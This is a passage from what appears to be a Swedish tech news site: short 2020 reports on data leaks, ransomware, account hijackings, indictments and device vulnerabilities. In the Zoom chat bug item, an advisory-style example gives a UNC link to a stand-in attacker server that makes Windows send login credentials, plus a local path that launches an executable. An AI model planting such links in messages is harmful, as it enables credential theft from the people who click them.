LIVE 17:00 AMD presenterar Radeon RX 6000
m
Innehåller annonslänkar
Dagens deal, utvald av Feber!
Jämför priser
Razer BlackWidow tangentbord kostar nu bara 999 kr (tidigare 1449 kr)

Watch Dogs: Legion lyckas inte riktigt tända aktivistlågan
Vi har spelat Ubisofts nya hackersimulator

Watch Dogs: Legion försöker röra runt i Ubisofts open world-gryta genom att låta oss befria områden som precis som vilken London-bo som helst, men detta sätter mest käppar i hjulet för berättelsen. Tumnagel
38.9°
+
André Stray
0

Uppgifter om säkerhetsklassade byggnader har läckt ut
Gunnebo-koncernen blev av med data under datorintrång

DN rapporterar att stora mängder data om säkerhetsklassade byggnader och annat har läckt ut efter det att säkerhetskoncernen Gunnebo drabbades av ett datorintrång i augusti. Enligt DN handlar det om över 38.000 filer som nu läckt ut på nätet vilka bland annat innehåller ritningar över bankers bankvalv, säkerhetsfunktioner runt bankomat-installationer, Skatteverkets kontor samt Riksdagens skalskydd. Förutom det så har finansiell information, kunddata, uppgifter om anställda, källkod till mjukvara, lösenord och annat läckt ut. När Gunnebo själva rapporterade om datorintrånget i augusti sa man att man hade hanterat det hela framgångsrikt, något som nu alltså inte alls verkar vara fallet. Gunnebos vd uppger att man då inte kände till att obehöriga kommit över deras data och säger till DN: "Men det vi visste då så var det framgångsrikt. Vi undvek en nedstängning. Men man lär sig mer hela tiden. Nu vet vi att vi blev bestulna på data och försöker hantera stölden på ett professionellt sätt." DN har även varit i kontakt med säkerhetsexperten Leif Nixon som är kritisk till hur Gunnebo hanterat datorintrånget och säger: "Gunnebo har fått förtroendet att hantera stora mängder känsliga data, från detaljerad information om bankers säkerhetssystem till uppgifter om inpasseringssystem för skyddsobjekt. Ett sånt förtroende kräver att man har koll på sin säkerhet. Att bli hackad är en sak, det kan man aldrig skydda sig hundraprocentigt från. Men det är under all kritik att hantera en incident så här dåligt. A och O när ett intrång inträffat är att fastställa vad som faktiskt hänt, och här hade tio minuters efterforskning räckt för att förstå risken för att kritiska data blivit stulna. Jag tror att Gunnebo har en lång resa framför sig för att återupprätta sitt rykte." Gunnebo är framför allt specialiserade på fysisk säkerhet för byggnader och har bland annat kunder som Försvarsmakten, FRA, Rikspolisstyrelsen, Tullverket och Strålsäkerhetsmyndigheten skriver DN. Här ovanför hittas en reklamfilm från Gunnebo. Ni kan läsa Gunnebos pressmeddelande efter att man utsattes för datorintrång i augusti här. Tumnagel
14.4°
+
Wille Wilhelmsson
0

Säkerhetsexpert säger sig ha tagit sig in på Trumps twitter
Med lösenordet "maga2020!"

En välrenommerad säkerhetsexpert från Nederländerna uppger att han tagit sig in på Donald Trumps twitter-konto genom att gissa presidentens lösenord. Säkerhetsexperten Victor Gevers uppger att han efter bara ett fåtal gissningar kunde ta sig in på Donald Trumps twitter-konto med lösenordet "maga2020!". Som bevis för att han faktiskt tog sig in på kontot så postade Gevers bland annat skärmdumpen som syns här ovanför. Vita Huset förnekar dock att någon obehörig tagit sig in på kontot och inte heller Twitter kan bekräfta att så varit fallet. En talesperson för Twitter säger i ett uttalande: "We’ve seen no evidence to corroborate this claim, including from the article published in the Netherlands today. We proactively implemented account security measures for a designated group of high-profile, election-related Twitter accounts in the United States, including federal branches of government." Det verkar med andra ord rätt oklart huruvida Gevers faktiskt tagit sig in på Trumps twitter-konto. Skulle så ha varit fallet så verkar det som om presidenten inte använder sig av tvåfaktors-auktorisering och är rätt så usel på att välja lösenord för att skydda kontot. Tumnagel
43.0°
+
Wille Wilhelmsson
0

USA åtalar ryska militärer för cyberattacker runt om i världen
Kan få skaka galler länge om de grips

Det amerikanska rättsväsendet åtalar nu sex stycken officerare tillhörande den ryska säkerhetstjänsten GRU för att ha legat bakom en lång rad cyberattacker och datorintrång runt om i världen. De sex åtalas bland annat för att genomfört dessa attacker mot Ukraina, Georgien, Vinter-OS i sydkoreanska PyeongChang samt attacker mot det franska valet. En åklagare vid United States District Court for the Western District of Pennsylvania har utfärdat en arresteringsorder mot de sex ryska officerarna och säger i ett uttalande: "The defendantsx27 and their co-conspirators caused damage and disruption to computer networks worldwide, including in France, Georgia, the Netherlands, Republic of Korea, Ukraine, the United Kingdom, and the United States." Cyberattackerna som de sex nu åtalas för ska ha pågått mellan 2015 - 2019 och åklagaren fortsätter: "Their computer attacks used some of the world’s most destructive malware to date, including: KillDisk and Industroyer, which each caused blackouts in Ukraine; NotPetya, which caused nearly $1 billion in losses to the three victims identified in the indictment alone; and Olympic Destroyer, which disrupted thousands of computers used to support the 2018 PyeongChang Winter Olympics." De sex GRU-officerarna Yuriy Sergeyevich Andrienko, 32; Sergey Vladimirovich Detistov, 35; Pavel Valeryevich Frolov, 28; Anatoliy Sergeyevich Kovalev, 29; Artem Valeryevich Ochichenko, 27 samt Petr Nikolayevich Pliskin, 32 riskerar upp till 27 års fängelse i USA om de skulle gripas och dömas för de brott de nu anklagas för i USA. Samtliga av de sex åtalade tros befinna sig i Ryssland och lär sannolikt inte bli utlämnade till USA Tumnagel
47.4°
+
Wille Wilhelmsson
0

Privata filmer från säkerhetskameror läckta på porrsajt
Hackers släppte 3TB filmer med sovrums-aktiviteter

Att installera säkerhetskameror som är uppkopplade mot nätet i sitt hem börjar bli populärt men kanske något man ska tänka över både och två gånger innan man ger sig i färd med det. Från Singapore kommer uppgifter om att hackers har kommit över över 3TB av filmer från privatpersoners smarta hem-kameror som de sedan lagt ut på en porrsajt. Det nu läckta materialet ska innehålla både filmer med sexuella inslag men även lite mer vardagliga aktiviteter skriver den Singapore-baserade nyhetssajten The New Paper. Den okända hackergruppen bakom intrånget uppger att man kommit över filmer från över 50.000 säkerhetskameror. Enligt The New Paper verkar många av de drabbade vara hemmahörande i Singapore men det ska även finnas drabbade i Thailand, Sydkorea och Kanada. Materialet som lagts ut på en privat "porrsajt" som hackergruppen skapat är delvis publikt men vill man ha tillgång till allt material så säljer gruppen livstids medlemsskap till sajten för 150 dollar. Enligt The New Paper har runt tusen personer hoppat på sajtens gratiserbjudande medan 70 personer uppges ha betalat för att få tillgång till allt material på sajten. Tumnagel
15.9°
+
Wille Wilhelmsson
0

Regeringens hemsida ligger nere
Oklart varför

Expressen rapporterar att Regeringens webbplats regeringen.se för tillfället ligger nere och har blivit ersatt av en så kallad fallback-sida. Regeringskansliet har bekräftat att Regeringens webbplats för tillfället ligger nere men varför så är fallet finns det inga uppgifter om ännu. Cajsa Holm, presskommunikatör på Regeringskansliet, säger till Expressen: "Just nu är det svårt att nå vår hemsida och vår driftsleverantör arbetar för att lösa frågan. Felsökning pågår." På den temporära hemsidan för Regeringen finns det kontaktuppgifter samt länkar till information om den pågående pandemin. Tumnagel
36.3°
+
Wille Wilhelmsson
0

Sveriges Radios twitter-konton kapades i helgen
Började skicka ut massa rasistiska inlägg

Flera av Sveriges Radios konton på Twitter kapades av någon obehörig i helgen varefter det börjades skickas ut en lång rad rasistiska inlägg från kontona. De tre twitter-kontona för SR Ekot, SR Politik och Ekonomiekot började i lördags skicka inlägg skrivna på engelska innehållande grova rasistiska inlägg som synes på skärmdumpen här nedanför. Samtliga tre konton har nu raderats från Twitter av SR. Vem som låg bakom kapningen av de tre kontona är än så länge okänt. Sveriges Radios presschef Claes Bertilson säger i en kommentar till kapningarna: "Dessa meddelanden kommer absolut inte från oss." Samtidigt säger Bertilson till Expressen att säkerheten för att få tillgång till SR:s konton är god. Något som dock flera av SR:s tidigare medarbetare inte verkar hålla med om. Journalisten Emil Hellerud som idag arbetar för TV4 och tidigare arbetat på SR säger bland annat på Twitter: "Hackningen" av @sr_ekot på Twitter aktualiserar ett kombinerat problem av hög personalomsättning och dålig it-säkerhetshygien. I 1-2 år efter att jag slutat på @sverigesradio hade jag kvar tillgång till facebookkonton som jag inte borde ha haft." Även frilansjournalisten Josephine Freje som arbetat för SR kritiserar företaget IT-säkerhet vilket ni kan se i tweeten här nedanför. Tumnagel
36.3°
+
Wille Wilhelmsson
0

Säkerhetshål hittat i manligt kyskhetsbälte
Obehöriga kan låsa in användares penisar för alltid

Det brittiska säkerhetsföretaget Pen Test Partners har hittat en säkerhetslucka i det manliga kyskhetsbältet Cellmate Chastity Cage, något som kan ge obehöriga kontroll över vem som kan låsa in användarens penis. Tanken bakom Cellmate Chastity Cage är att en man ska kunna låta sin partner "låsa in" användarens penis. Detta kanske skulle vara intressant om användaren är notoriskt otrogen eller har andra problem med att kontrollera sin penis. Säkerhetsluckan som nu hittats låter obehöriga ta kontrollen över kyskhets-manicken via den tillhörande appen. Det innebär att en obehörig skulle kunna låsa in användarens penis. Än värre är så finns det inget sätt att åsidosätta det kommandot från tillverkaren, det kinesiska företaget Qiui. Det finns inga uppgifter om att säkerhetsluckan i Cellmate Chastity Cage än så länge har drabbat någon av deras användare. Skulle så bli fallet så måste användare klippa upp låset med en bultsax eller kortsluta batterierna i kuklåset. Två saker som man kanske helst undviker att göra i närheten av sin penis. Vi rekommenderar ingen att använda sig av manicker som Cellmate Chastity Cage. Skulle du trots det vara sugen så kostar de 130 dollar styck. Här nedan går Pen Test Partner igenom säkerhetsluckan i Cellmate Chastity Cage. Tumnagel
50.0°
+
Wille Wilhelmsson
0

Polisen har ansökt om att hacka grejer över hundra gånger
Sedan ny lag trädde i kraft i våras

Den 1 april i år trädde lagen om så kallad hemlig dataavläsning i kraft och DN har undersökt hur många gånger polisen har använt sig av den nya lagen för att "hacka" misstänkta personers mobiltelefoner och datorer. Lagen om hemlig dataavläsning innebär att polisen har rätt att installera trojaner eller annat på en misstänkt persons mobiltelefon eller dator i syfte att kunna läsa av datatrafiken till och från dessa. Varje gång polisen vill göra det måste en ansökan om avlyssning godkännas av domstol. Enligt DN har detta skett 136 gånger sedan lagen trädde i kraft 1 april. Det finns inga uppgifter om hur ofta dessa ansökningar godkänts men det ska vara extremt ovanligt att de inte godkänns av domstol. Endast 0,6 procent av ansökningarna om avlyssning som inkom i fjol avslogs. Polisen själva vill inte kommentera hur ofta man ansökt om hemlig dataavläsning och Gabriel Wernstedt, pressekreterare på Säkerhetspolisen, säger till DN: "Vi kan inte prata om hur vi använder de verktyg vi har." Tumnagel
40.5°
+
Wille Wilhelmsson
0

Nintendo-hackare gripna i USA
Team Xecuter hackade flera av Nintendos konsoler

FBI har gripit två medlemmar av hacking-gruppen Team Xecuter efter att dessa anklagats för att hackat flera av Nintendos konsoler. Team Xecuter har i över tio år sålt olika hårdvaru-moddningar som öppnat upp konsoler som Nintendo Switch, Nintendo 3DS och NES Classic för att köra piratkopierade spel, något som inte setts med blida ögon av Nintendo. De båda gripna männen är 48 och 51 år gamla och kommer nu att åtalas på elva olika punkter. Vad de riskerar för straff framgår inte i dagsläget. Team Xecuter tros bestå av över ett dussin medlemmar och även den 35-årige man som tros vara ledaren för gruppen kommer att åtalas i USA. Han är dock inte gripen då han tros befinna sig i Kina. Tumnagel
30.2°
+
Wille Wilhelmsson
0

Det kan straffa sig att smita före i kön till högskoleprovet
"Hackers" kan eventuellt få sina provresultat underkända

I morse öppnade kön till att skriva årets högskoleprov, ett prov som i år fått ett begränsat antal platser på grund av pandemin. Tidigt upptäckte någon att det var förhållandevis enkelt att ta sig förbi kön om man hade lite kodar-talang vilket nu även har kommit till de ansvariga för högskoleprovets kännedom. Från deras håll sägs det nu att systemet är utformat för att hitta dem som fuskat sig före i kön och att man kommer att ta hänsyn till detta när platserna för att skriva högskoleprovet delas ut. Eventuellt kommer de som fuskat och faktiskt får skriva provet få sina resultat underkända i efterhand. Peter Honeth är högskoleprovets nationella samordnare och han säger till Aftonbladet: "Systemet är utformat på ett sätt så att de som har gått före kommer kunna fångas upp i efterhand. De kommer alltså upptäckas.Vi har inte tagit några beslut än. Men teoretiskt sett kan vi ta bort provresultatet för de personer som har gått före i kön, om det ens hinner gå så långt att de kan genomföra provet." Totalt finns det 27.600 platser till höstens högskoleprov och när anmälan till kön varit öppen i tre timmar hade 33.000 personer ställt sig i denna. Tumnagel
36.9°
+
Wille Wilhelmsson
0

Synsams webb har varit nere i över en vecka
Verkar ha drabbats av ransomware-attack

Glasögon-företaget Synsam drabbades förra veckan av något slags datorintrång och sedan dess verkar det ha varit körigt för företagets it-avdelning. Synsams webbplats ligger fortfarande nere och på Synsam.se finns för tillfället bara en temporär webbplats, ehandels-funktionen på webbplatsen har inte fungerat sedan datorintrånget skedde förra veckan. Datorintrånget ska även ha påverkat kassasystemen i Synsams fysiska butiker men detta ska vara uppe och rulla nu skriver Ehandel.se. Synsam har själva inte velat kommenterat datorintrånget men det mesta tyder på att det handlar om en ransomware-attack. Det innebär att obehöriga har krypterat datan i Synsams system och krävt en lösensumma för en krypteringsnyckel som låter Synsam få tillgång till sin data igen. På darknet har det dykt upp en annons på auktionssajten Happy Blog som uppmanar Synsam att ta kontakt med annonsören om man vill få tillgång till sina datorsystem skriver den norska tech-sajten NRK Beta, en annons ni kan kolla in här nedanför. Tumnagel
19.1°
+
Wille Wilhelmsson
0

Tesla försöker stoppa trim-hack
Vill man ha snabbare bil får man köpa det av Tesla

I en ny uppdatering till Tesla Model 3 har Tesla lagt in en varning som upplyser dem som använt trim-kit som inte auktoriserats av Tesla om detta. Det ska handla om ett kit från företaget Ingenext som gör samma ska som den upplåsning av extra kraft i bilen som Tesla själva säljer för 2000 dollar. Upplåsningen ska ge Tesla Model 3 cirka 50 extra hästkrafter och låta bilen göra 0 - 100 på 3,9 sekunder. De användare som installerat Ingenext lösning, en lösning som säljs för cirka 1100 dollar, får efter Teslas senaste uppdatering upp varningen som syns på bilden här nedanför. Bilen går fortfarande att köra men varningen försvinner inte från bilens skärm under körning. Ingennext grundare Guillaume André säger till Elektrek att företaget arbetar på att ta fram en patch till sitt trim-hack som ska göra att deras användare kan runda Teslas egna försök till blockering av detta. Uppdateringen förväntas släppas inom en till två veckor. Tumnagel
41.7°
+
Wille Wilhelmsson
0

Canon utsatta för ransomware-attack
Har fått data både krypterad och stulen

Förra månaden blev Garmin utsatta för en ransomware-attack och detta är något som nu även verkar ha drabbat kameratillverkaren Canon. Enligt Bleeping Computer så ska förövarna bakom ransomware-attacken mot Canon stulit 10TB data från diverse databaser som Canon förfogar över. Då Canon har en molntjänst dit Canons användare kan ladda upp sina bilder är det väl inte helt omöjligt att även dessa fallit i orätta händer. I ett meddelande som Canon ska ha fått från den eller dem som ligger bakom attacken så ska Canons system ha infekterats med ransomwaret Maze. Till skillnad från ransomwaret WastedLocker, som användes mot Garmin, så ska Maze både kryptera filer i den drabbades nätverk såväl som skicka dessa filer vidare till förövarna. Det här innebär med andra ord att även om Canon skulle lyckas låsa upp sin data på egen hand så riskeras den stulna datan att läcka ut om inte Canon betalar en lösensumma till utpressarna. Tumnagel
22.8°
+
Wille Wilhelmsson
0

Twitter-hackares domstolsförhör zoombombades
Någon började sända porr under förhöret

Nu har processen mot de som misstänks ligga bakom det stora datorintrånget mot Twitter förra månaden dragit igång. Datorintrånget innebar att en lång rad kända personers konton kapades och dessa började sedan skicka ut meddelanden som försökte lura in mottagarna i en bitcoin-scam. Det tog bara några veckor innan de som antogs vara skyldiga för intrånget greps och bland dessa fanns bland annat en 17-årig från Florida greps. Igår skulle ett första domstolsförhör med tonåringens advokat genomföras och på grund av pandemin genomfördes denna via videokonferens-tjänsten Zoom. För att allmänheten skulle kunna delta sändes det hela utan något lösenordsskydd eller registreringskrav, något som visade sig vara mindre genomtänkt. Flera av de närvarande på Zoom-förhörer försökte störa detta genom att spela musik och avbryta de som talade med diverse svärord. Det hela verkar ha eskalerat under förhörets gång och till slut togs hela förhöret över av en användare som började streama porrklipp från PornHub till deltagarna i förhöret. Förhöret verkar trots alla ha kunnat genomföras och det hela resulterade i att 17-åringens borgensumma sattes till 725.000. Domaren i fallet sa även att eventuella framtida zoom-förhör kommer att vara lösenordsskyddade och att dessa inte kommer att var helt öppna för allmänheten. Tumnagel
40.2°
+
Wille Wilhelmsson
0

LastPass håller koll om dina lösenord dyker upp på dark web
Lösenordshanterare introducerar ny säkerhetsfunktion

Lösenordshanteraren LastPass har uppdaterat sin så kallade "Security Dashboard" med ett nytt gränssnitt och även passat på att introducera den nya funktionen "Dark Web Monitoring". Med "Dark Web Monitoring"-funktionen får LastPass-användare reda på om lösenord de lagrat i LastPass till olika tjänster finns ute till försäljning på Dark Web. Funktionen liknar de som tjänster där man manuellt kan kontrollera om någon av ens lösenord har läckt ut via något av de otaliga hack som skett mot diverse tjänster de senaste åren. Med "Dark Web Monitoring" får dock användaren ett meddelande om detta direkt med en uppmaning att byta ut lösenordet. "Dark Web Monitoring" till LastPass är en betalfunktion som inkluderas för de LastPass-användare som är anslutna till LastPass Premium, LastPass Family eller LastPass Business. Tumnagel
44.4°
+
Wille Wilhelmsson
0

Sårbarhet hittade i Apples säkerhetschip Secure Enclave
Hackers kan komma åt lösenord och annat

Det har kommit uppgifter om att den kinesiska jailbreaking-gruppen Pangu Team har hittat ett säkerhetshål i Apples Secure Enclave-processor, ett säkerhetshål som potentiellt öppnar upp en massa Apple-prylars lagring av lösenord, kreditkortsuppgifter och biometrisk inloggingsdata till Touch ID och FaceID. Secure Enclave är ett chip som hanterar data som krävs för inloggning och betalningar via datorn. Denna data går inte att komma åt direkt från någon av datorns program. När någon app behöver tillgång till denna data så hanteras detta via Secure Enclave som bara skickar tillbaka resultatet, inte själva datan i sig. Säkerhetshålet ska ha fixats i Secure Enclave-chippet i Apples Bionic A12- och A13-chip men finns kvar i Apples chip A7 till och med A11 Bionic. Då det ska handla om en sårbarhet i själva hårdvaran så ska det inte finnas någon mjukvara som kan rätta till det hela. Det innebär att miljontals lite äldre iPhones, iPads och Mac-datorer har sårbarheten permanent. Det krävs dock att en eventuell hacker har fysisk tillgång till prylen för att de ska kunna komma åt datan som lagras på Secure Enclave, något som gör att man inte riskerar att drabbas så länge man har någorlunda koll på var man har sina Apple-prylar. Apple har själva än så länge inte kommenterat säkerhetshålet i Secure Enclave och det är okänt om någon använt sig av sårbarheten för att få tillgång till data från någon av Apples produkter. Här nedan hittas en schematisk bild som visar hur Secure Enclave fungerar när någon använder en inloggnings-funktion vars lösenord lagrats krypterat i Secure Enclave. Tumnagel
32.7°
+
Wille Wilhelmsson
0

BadPower kan få prylar att börja brinna
Nytt hack använder snabbladdare för att sabba mobiler och annat

Säkerhetsforskare på det kinesiska jätteföretaget Tencent har hittat sårbarheter i snabbladdare till mobiltelefoner, laptops och annat som gör att dessa kan förstöra och i värsta fall även tända eld på till exempel en mobiltelefon eller en laptop. Batteriladdare med snabbladdning kan själva reglera spänningen som skickas till prylen som laddas genom att kommunicera med denna. En snabbladdare som infekterats med det som forskarna kallas för "BadPower" kan däremot öka spänningen till mer än vad mobiltelefonen eller laptopen klarar av att ta emot, något som kan leda till att de kan börja brinna som synes i videoklippet ovan. Tencents forskare har analyserat 35 modeller av snabbladdare och av dessa ska 18 stycken ha varit möjliga att utsätta för en BadPower-attack. Enligt forskarna så ska detta gå att avhjälpa genom att uppdatera firmwaret i snabbladdarna så att dessa inte kan påverkas av en attack. Tyvärr så märkte forskarna även att firmwaret i 18 av de 34 chip till snabbladdare man analyserat var av en typ där firmwaret inte gick att uppdatera. Tumnagel
37.3°
+
Wille Wilhelmsson
0

Facebooks tvist mot NSO fortsätter
Övervakningsföretag kan inte gömma sig bakom sitt planerade försvar

En domare i Kalifornien beslutade igår att Facebooks stämning mot det israeliska spyware-företaget NSO Group kan fortsätta. Det får ses som ett stort bakslag för NSO som hade hoppats på att målet skulle läggas ner. NSO Group anklagas för att ha hackat Facebooks meddelandetjänst WhatsApp i syfte för att övervaka användare där åt någon av sina okända kunder. NSO ansåg att målet skulle läggas ner då deras kunder är suveräna stater som inte kan åtalas i amerikansk domstol, något som företaget ansåg även skulle gälla dem. Detta ansåg dock inte domaren i Kalifornien och därför kan Facebooks juridiska tvist mot NSO nu fortsätta. NSO Group säljer övervakningsprogramvara till en lång rad stater som använder denna i mer eller mindre nogräknade syften för att övervaka datatrafik. NSO hävdar oftast själva att deras tjänster används för att bekämpa brott och terrorism. Det finns dock tecken på att flera av NSO:s kunder använder deras tjänster för att övervaka människorättsaktivister, journalister, politiker och andra personer som vissa stater kan anse vara "besvärliga". Det finns ingen komplett lista över vilka länder som är kunder till NSO Group men deras spyware-programvara Pegasus sägs användas av minst 45 länder enligt The Citizenlab på Toronto University. Tumnagel
43.8°
+
Wille Wilhelmsson
0

Honda fick stänga ner fabriker efter cyberattack
Ransomware stoppade Hondas bil- och motorcykelproduktion

Biltillverkaren Honda fick igår stänga ner produktionen vid en del av sina anläggningar efter det att företaget drabbats av någon slags cyberattack rapporterar flera källor. Bloomberg News skriver bland annat att bilproduktionen vid Hondas anläggningar i den amerikanska delstaten Ohio såväl som deras fabrik i Turkiet fick lägga ner produktionen temporärt. Det samma gällde Hondas motorcykelfabriker i bland annat Indien och Sydamerika. Det hela ska ha handlat om en så kallad ransomware-attack, attacker vars syfte oftast är att pressa den drabbade på pengar för att bli insläppta i sitt system eller få tillgång till sin data igen. Honda uppger att man inte har hittat något som tyder på att information från företaget läckt ut i samband med attacken. En talesperson för Honda säger till Ars Technica om det inträffade: "Honda has experienced a cyberattack that has affected production operations at some US plants. However, there is no current evidence of loss of personally identifiable information. We have resumed production in most plants and are currently working toward the return to production of our auto and engine plants in Ohio." Tumnagel
32.7°
+
Wille Wilhelmsson
0

Nytt jailbreak släppt till iOS
Unc0ver 5.0 öppnar upp allt från iOS 11 till iOS 13.5

Hackergruppen Unc0ver har släppt en ny version av sitt jailbreak-verktyg som man uppger ska kunna jailbreaka alla iPhones som kör allt från iOS 11 till den senaste versionen iOS 13.5. Det innebär att användare kan öppna upp sina iPhones för att till exempel installera appar som inte Apple vill distribuera via App Store. Den senaste versionen av Unc0ver finns tillgänglig för att jailbreaka iPhones via macOS, Windows eller Linux. Jailbreaking av iPhones var något som var rätt populärt förr i tiden men som någorlunda dött ut i takt med att de flesta appar som användare vanligtvis behöver nu finns att tillgå i App Store. Tumnagel
36.1°
+
Wille Wilhelmsson
0

Kina anklagas för att försöka stjäla forskning om coronaviruset
Anklagas av FBI för hackingattacker mot forskningsinstitutioner

FBI och Cybersecurity and Infrastructure Security Agency (CISA) har nu släppt ett gemensamt uttalande där de varnar för att kinesiska intressen försöker stjäla forskning om coronaviruset. Enligt de båda amerikanska myndigheterna så ska detta bland annat ha visat sig i ett ökat antal hacking-attacker mot amerikanska forskningsinstitutioner som forskar om det nya coronaviruset och covid-19. I uttalandet skriver bland annat de båda myndigheterna: "These actors have been observed attempting to identify and illicitly obtain valuable intellectual property (IP) and public health data related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research. The potential theft of this information jeopardizes the delivery of secure, effective, and efficient treatment options." FBI och CISA uppmanar nu alla forskningsinstitutioner som forskar om coronaviruset att vara extra uppmärksamma på eventuella hackingattacker eller andra försök från obehöriga att komma över deras forskningsresultat. Tumnagel
14.3°
+
Wille Wilhelmsson
0

Hårdvaruhacker fixar chip som bara kan köra DOOM
Kan inte köra Crysis

I år är det 27 år sedan den första versionen av FPS-spelet DOOM släpptes och det är ett spel som sedan dess har dykt upp på de flesta plattformar i en eller annan version. Nu har datorentusiasten och hårdvaruhackern Sylvain Lefebvre utvecklat en liten maskin som är helt dedikerad till att köra den första versionen av DOOM. Den lilla datorn använder sig av kretskortet Cyclone V FPGA som ursprungligen utvecklades för att fungera som "hjärna" i lite enklare maskiner skriver Engadget. Chippet har dock kommit att bli populärt i olika typer av hemmabyggen och nu går det alltså även att spela DOOM med hjälp av det. Lefebvre uppger att han lagt till 666 rader kod för att få DOOM att rulla på hans "DooM-Chip", något som jag antar knappast kan ha varit slumpmässigt. Tumnagel
43.0°
+
Wille Wilhelmsson
0

BankID utsattes för attack i veckan
Oklart vem som överbelastade tjänsten

I tisdags låg BankID nere under flera timmar och nu uppges det att detta berodde på att någon attackerat tjänsten med någon typ av överbelastnings-attack. Det är inte första gången BankID:s tjänst ligger nere men det ska vara första gången detta beror på att någon attackerat tjänsten i den här omfattningen. Varför tjänsten attackerats och vem som står bakom detta finns det än så länge inga uppgifter om. Malin Wemnell, pressansvarig för BankID, säger till Sveriges Radio: "Det är svårt att svara på vad syftet kan ha varit eller vem som är angriparen. Dessvärre är överbelastningsattacker ett hot mot alla verksamheter som finns på internet och som har en digital närvaro precis som vi har." Ingen användardata ska ha läckt ut under attacken och BankID ska nu genomföra en undersökning för att försöka klarlägga vad som har hänt och hur det kunde ske. Tumnagel
25.2°
+
Wille Wilhelmsson
0

Tut i luren - 20 år sedan ILOVEYOU började spridas
Datorviruset som orsakade skador för miljardtals dollar

Idag är det 20 år sedan det ökända ILOVEYOU-viruset började spridas över världen. Detta uppmärksammar BBC genom att spåra upp mannen som av misstag råkade orsaka skador för miljardtals dollar för företag och andra runt om i världen. I BBC:s reportage, som ni kan läsa i sin helhet på länken nedan, skriver man om hur man letade upp den idag 44-årige datorentusiasten Onel de Guzman i hans hemland Filippinerna. Guzman pekades ut redan en vecka efter ILOVEYOU-viruset började spridas och uppgav då att han gjort detta för att komma över lösenord som kunde ge honom tillgång till andra användares internetkonton, något som tydligen var "hårdvaluta" i Filippinerna på den tiden. Viruset bestod av en så kallad mask som när den öppnades kopierade sig själv och skickades vidare som epost till alla kontakter i drabbade Windows-användares kontaktbok. Detta ledde till kaos på bara något dygn och man räknar med att över 45 miljoner datorer infekterades under virusets första 24 timmar, något som Guzman inte hade räknat med. Det har senare beräknats att ILOVEYOU spreds till 10 procent av alla datorer som på den tiden var uppkopplade till internet. Kostnaderna som havererade och nedstängda system orsakade uppges ha varit minst 5,5 miljarder dollar och det uppskattas ha kostat amerikanska företag och myndigheter ytterligare 15 miljarder dollar för att rensa bort masken en gång för alla från nätet. I början av 2000-talet hade Filippinerna inga sorts lagar som reglerade den här typen av brott och Onel de Guzman har aldrig fått något straff för att han utvecklade och spred vad som tros vara världens kostsammaste datorvirus. Tumnagel
40.9°
+
Wille Wilhelmsson
0

Hotellkedjan Marriott hackad igen
Blev av med uppgifter till 5 miljoner kunder den här gången

Den stora hotellkedjan Marriott har meddelat att man ännu en gång utsatts för ett datorintrång där uppgifter från deras hotellgäster har läckt ut. Det ska handla om saker som namn, födelsedatum, telefonnummer, kundnummer och liknande som ska ha läckt ut. Enligt Marriotts interna undersökningar så ska ingen betalningsinformation om kundernas bankkort och liknande ha läckt ut. Man tror att så många som 5 miljoner hotellgäster kan ha fått sin personuppgifter läckta i det senaste datorintrånget Marriott utsatts för. Marriotts dotterföretaget Starwood upptäckte 2018 ett annat datorintrång man som hade drabbat hotellkedjan. Det hade pågått i fyra år och under den tiden tror man att obehöriga kom över uppgifter om 383 miljoner av Marriott och Starwoods hotellgäster. Tumnagel
26.3°
+
Wille Wilhelmsson
0

Bugg kan lura av Zoom-användare inloggningsuppgifter
Om de råkar klicka på "elaka" länkar

Bleeping Computer rapporterar att videochatt-tjänsten Zoom har en ganska otrevlig bugg som gör att Windows-användare i värsta fall kan lämna över sina inloggnignsuppgifter till någon obehörig. Buggen består i att Zooms tillhörande chatt-tjänst gör om vissa saker som skickas i chatten till klickbara länkar. Tanken verkar vara att om någon till exempel skriver feber.se i ett chattfönster så ska detta automatiskt konverteras till länken feber.se så att detta blir klickbart. Problemet är Zoom även konverterar sökvägar till Windows så kallade UNC (Universal Naming Convention) till länkar. Det handlar om länkar som till exempel kan se ut så här: "\\evil.server.com\images\cat.jpg". När någon klickar på en sådan länk kommer Windows-maskiner att försöka ansluta till den aktuella servern via SMB-protokollet och då automatiskt skicka över användaren inloggnings-uppgifter. Dessa ska sedan vara hyfsat enkla att dekryptera för mottagaren som eventuellt fångar upp anropet enligt Bleeping Computer. Förutom det så skulle någon även kunna få Windows-användare att kicka igång olika program på datorn genom att klicka på länkar i zoom. "\\127.0.0.1\C$\windows\system32\calc.exe" skulle till exempel starta datorns miniräknare. Det ska observeras att användaren först kommer att tillfrågas om det aktuella programmet ska öppnas. För att komma till rätta med det här problemet föreslår Bleeping Computer att Zoom fixar buggen på sin sida så snabbt som möjligt. Det finns även en workaround som förhindrar att UNC-anrop skickar inloggningsuppgifter automatiskt. Ni hittar den på länken nedan men det är en lösning som jag enbart rekommenderar för någorlunda erfarna Windows-användare (typ ni som har orkat läsa ända hit). Vi andra ska nog mest hålla koll på hur länkarna vi klickar på i Zoom faktiskt ser ut tills Zoom fixar den här buggen. Tumnagel
33.7°
+
Wille Wilhelmsson
0

Idag träder lagen om hemlig dataavläsning i kraft
Nu får polisen hacka datorer och mobiler

Idag är det första april vilket bland annat innebär att sveriges nya lag om hemlig dataavläsning träder i kraft. Lagen innebär att polisen får rätt att hacka mobiltelefoner, datorer och annat om polisen tror att detta kan underlätta för att lösa olika typer av brottslig verksamhet. Inrikesminister Mikael Damberg säger om den nya lagen som börjar gälla idag: "Den nya lagen är en viktig del i regeringens arbete för att motverka den grova och organiserade brottsligheten i Sverige. Hemlig dataavläsning ger bättre och effektivare möjligheter att ta del av information som tidigare inte varit tillgänglig. Det är ett kraftfullt verktyg för att komma åt de individer och gängnätverk som tidigare har kunnat komma undan." Huruvida polisen ska få rätt att avlyssna våra prylar med hjälp av olika tekniska hjälpmedel, det som vi vanligtvis kallar för "datorintrång" eller "hacking", har debatterats sedan 2015. Både Datainspektionen och Advokatsamfundet har varit kritiska till den nya lagen som man menar är ett för stort ingrepp i den personliga integriteten. Man är även oroliga för att det hela kommer att missbrukas. Den nya lagen som idag träder i kraft ger förutom Polismyndigheten även Säkerhetspolisen, Tullverket och Ekobrottsmyndigheten rätt att använda hemlig dataavläsning i form av till exempel datorintrång eller installation av så kallade trojaner på mobiltelefoner och datorer. Tumnagel
4.5°
+
Wille Wilhelmsson
0

Stor darknet-operatör hackad
Har lett till att tusentals webbplatser försvunnit från från dark web

